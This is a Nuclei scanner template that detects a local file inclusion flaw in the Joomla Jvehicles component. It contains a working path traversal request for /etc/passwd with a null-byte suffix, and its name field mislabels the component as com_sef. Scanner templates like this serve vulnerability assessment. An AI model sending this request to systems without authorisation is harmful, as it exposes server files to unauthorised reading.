my-nuclei-templates/joomla-jvehicles-lfi.yaml

31 lines
928 B
YAML

id: joomla-jvehicles-lfi
info:
name: Joomla! Component com_sef - Local File Inclusion
author: daffainfo
severity: high
description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php.
reference:
- https://www.exploit-db.com/exploits/11997
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
remediation: Upgrade to a supported version.
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by cs on 2022/03/25